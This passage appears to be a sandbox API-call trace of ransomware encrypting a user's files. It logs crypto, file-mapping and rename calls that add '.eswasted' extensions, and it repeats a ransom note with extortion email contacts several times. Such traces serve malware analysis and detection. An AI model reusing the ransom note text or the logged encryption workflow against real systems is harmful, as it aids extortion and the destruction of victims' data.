_Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]WWaAq3BrvfApWBAeNtrmqNEa28RlI0nIykw3mZJfIPj5CbzLW7VDzdG9a/Eekgnf\r\nOVTysIeQwpE8lJ7JQS4se9FTn9qBvhlU72++Fp9CKS6txgWZfnkdGezlcew3gCe4\r\nuM+Qn2apBbkY/+t2C3k1OwpkzE6y9kjeJGEW7TsMa2gysbStYSuVwwgMeopn7mAi\r\nTx9/FYFSdVVWLBVwWkjsRD1J6hiWnsIZ+jf5jlq1u9OjXXWD5l17Dc4wr0+ob3lT\r\nZxwQoPjeUsHi9haJn6liIXUp4ZeS2yO7G3wRzQSENPNhZ1DC7Wo3uq7Z1SW/7MCY\r\nL5kCWDZbihPo3Q5Ppuxh5nA8CSgESFnTPl8gg7Wpfqrw3EtEsOR00puvDi49yhUQ\r\nKVwKp7/VOXu2ehu3MeZX2owQvIr9TihwK/Vrb6f6LjKp0o58mk+PXWppxd6omIOf\r\nEK/SxctAfiPQhp+mO41IFP0VXCDeziB6kS0BtB/OhVL49NZDw8oc+gGjHr1UKRut\r\n4M+RMSK7W6b5wD2eDRS1C27g9GUDlsCttLoQoMuz3Oc92RlxcUgveNvHg4qyEhJE\r\nI3v0QNXPsH/+CkuDEDRebLDYW1hAO8/H3A8VoOQYIZw1Ru5GizvPY7t3MV/GUinf\r\n7gq63kB3BK+rNsV6JxKLk0Bq5Y+QpFWVg+q+IpK9JiW=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.516] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.516] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.516] SetEndOfFile (hFile=0xfc) returned 1 [0081.518] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.518] CloseHandle (hObject=0xfc) returned 1 [0081.520] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.520] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x50afa0 | out: hHeap=0x4a0000) returned 1 [0081.520] _aulldvrm () returned 0x0 [0081.520] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.521] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.521] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\FsAtPVnb7HWLACVS8 l.png") returned 104 [0081.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2da) returned 0x4ef648 [0081.521] lstrcpyW (in: lpString1=0x4ef718, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.521] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.521] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.522] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.522] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\FsAtPVnb7HWLACVS8 l.png.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\fsatpvnb7hwlacvs8 l.png.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.522] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.524] SetEndOfFile (hFile=0xfc) returned 1 [0081.524] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.524] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.524] lstrcpyW (in: lpString1=0x4ef718, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\FsAtPVnb7HWLACVS8 l.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\fsatpvnb7hwlacvs8 l.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\FsAtPVnb7HWLACVS8 l.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\fsatpvnb7hwlacvs8 l.png.eswasted")) returned 1 [0081.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\FsAtPVnb7HWLACVS8 l.png.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\fsatpvnb7hwlacvs8 l.png.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.526] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.526] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xd39b [0081.526] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd39b) returned 0x2d0000 [0081.526] CloseHandle (hObject=0x100) returned 1 [0081.529] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.530] CloseHandle (hObject=0x118) returned 1 [0081.530] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4efe18 [0081.530] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.531] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4efe60 | out: pbBuffer=0x4efe60) returned 1 [0081.531] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.531] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.531] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.531] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.588] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4d91a8 [0081.588] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.588] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.588] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]uEhHHl01plsPJlmxDzw9yLn7PaGS1k9PnQzn4h1OOylCv24O9iVRGFdtFD2+u5ss\r\nKjzy5rmKiY4EUzGqjMKwItNIphIgeSytWs9BBRNWZj9swpwJCtu41YTxC2HCj+6p\r\nyO4lzRSPHb7ZoTQOa/CqIzonxBZmfbyiuYmDxeoEcpzD1th8zG0pWN8AsIIOJYCj\r\nBffeSTmzpcb4/yjB1qa+QOIWJn6L49Ab+mnl2Rhor36UwdVG0CcE+TgJfOWcrFHW\r\ncmFcTSyL28fP9wBqg8wGjACcX1r6EbQvQ2xO5Uant6Zd6jP8f6NaVtZ0/AOgkWjN\r\ntMMfMUv5t/tBkV3dwK86sibANzKN/iuPxFWIW0qbwnxGdjaVu5Tq+o7ma7EobW4y\r\n8tN++V9bscg+hX6uMKDP0lc2ng0yI84dcfWM2hxxngG7wzbsBv/p05x29hsb89jP\r\npzTRnXa2T1W+L3+lbcFg3hD1jVQUTh029FU6c7/KXQ+jubz+ALnIpmJzIDmbpYkA\r\nIpz47dro4sv6EPXARsH+qPVK/AJLq1Sx3gTgDUge0Zl7Xp5cAE+kguBz18MqosR9\r\ntneBlmP1qXrsd5AzRA65S5nBvdqM65F9f1xu/MynkUiewq10OkS3MYvFTKpeamJ0\r\nr5hyarm5tly02H7McZHeyVv5fHT1zwzM0y721q8se9A=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.588] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.588] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.589] SetEndOfFile (hFile=0xfc) returned 1 [0081.591] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.591] CloseHandle (hObject=0xfc) returned 1 [0081.593] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.594] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f03f0 | out: hHeap=0x4a0000) returned 1 [0081.594] _aulldvrm () returned 0x0 [0081.594] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.595] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.595] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.595] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\yyCgmbRbltuBs7fx.jpg") returned 71 [0081.595] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x298) returned 0x4d91a8 [0081.595] lstrcpyW (in: lpString1=0x4d9236, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.595] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.595] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.596] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.596] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.596] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\yyCgmbRbltuBs7fx.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\yycgmbrbltubs7fx.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.597] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.598] SetEndOfFile (hFile=0xfc) returned 1 [0081.598] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.598] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.598] lstrcpyW (in: lpString1=0x4d9236, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.598] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\yyCgmbRbltuBs7fx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\yycgmbrbltubs7fx.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\yyCgmbRbltuBs7fx.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\yycgmbrbltubs7fx.jpg.eswasted")) returned 1 [0081.599] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\yyCgmbRbltuBs7fx.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\yycgmbrbltubs7fx.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.599] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.599] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x74c8 [0081.600] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x74c8) returned 0x2d0000 [0081.600] CloseHandle (hObject=0x100) returned 1 [0081.602] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.603] CloseHandle (hObject=0x118) returned 1 [0081.603] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4efe18 [0081.603] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.604] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4efe60 | out: pbBuffer=0x4efe60) returned 1 [0081.604] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.604] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.605] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.605] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.613] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ef440 [0081.613] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.613] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.613] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]lxDM0fQy+mX9APuU6AfYzwf2uNZSC7kq+YZjrcWVdJ7rFIFOgVko9fGqm5Phd7DV\r\nCjtPQrMbZVgwqUhtoz3Ph3VgkVbFrSuBsSjUMRrWJ4YLajhl+D9wm52Aruz0+1kV\r\nViI29jKo/EP9Md7BFVJfMXJf4lemtvWQD62vfymcan4s+SFA7FN8/N9VrpaeZnv/\r\nd2+G3YFPtMcPjtbgCCD7Lo04NT/cY9MMhLmIhvWNPWTnjnEjRRj3NGw3s5Xiwjde\r\nn5PYf1pkXl7GOJdn3BgAiBJxhrqlBcny1DOm4MgzGMQh0GHyUM4RzPcjieFVxZHK\r\nvk+B/Q0Lm7BrwNJ238QOwjvIFVuhys8pIv5E3NYMOxEasBlWW7GpPcNLxK167rx9\r\nBby0QhnR66WqDtW9axA+rH4BthdOFN1/QEcm1i6GMOFsjLFPYSgw++BqfrGizfmv\r\nw5gtOQC2hm3Nh/QZ/LkMbUesWoiKiiCFWVRql3M5DlsJT2BYqgi435LkEeGb8Y3O\r\nRHqpSBhf+fCW3wbhtHpZm3ujmCfg0DZuKRcpEJqE9YiNz33ibM/YpWFcgkaC0yrP\r\nVHTV7iDNc9m7i8cnkDwOFEo/Hl+BB5Tgyy2go1z8usZk8F+2af/7bROUTwvrVc3Y\r\n9a3/K5pnLi0v8TTiccoJ+wnis7M2YwPatq3g/93K4OL=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.613] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.613] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0081.613] SetEndOfFile (hFile=0xfc) returned 1 [0081.615] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.615] CloseHandle (hObject=0xfc) returned 1 [0081.617] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.618] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5003d0 | out: hHeap=0x4a0000) returned 1 [0081.618] _aulldvrm () returned 0x0 [0081.618] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.619] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.619] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.619] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned 63 [0081.619] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x288) returned 0x4d91a8 [0081.619] lstrcpyW (in: lpString1=0x4d9226, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.619] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.619] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.620] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.620] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.620] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.621] WriteFile (in: hFile=0xfc, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.622] SetEndOfFile (hFile=0xfc) returned 1 [0081.623] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.623] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.623] lstrcpyW (in: lpString1=0x4d9226, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.623] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted")) returned 1 [0081.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.624] GetLastError () returned 0x5 [0081.624] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted")) returned 0x23 [0081.624] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x22) returned 1 [0081.625] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.625] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.625] GetFileSize (in: hFile=0x118, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xf8 [0081.625] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xf8) returned 0x2d0000 [0081.625] CloseHandle (hObject=0x118) returned 1 [0081.663] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.663] CloseHandle (hObject=0x100) returned 1 [0081.663] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms.eswasted", dwFileAttributes=0x23) returned 1 [0081.664] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ef6d0 [0081.664] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.665] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef718 | out: pbBuffer=0x4ef718) returned 1 [0081.665] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.665] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.666] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.666] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.674] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0081.674] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.674] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 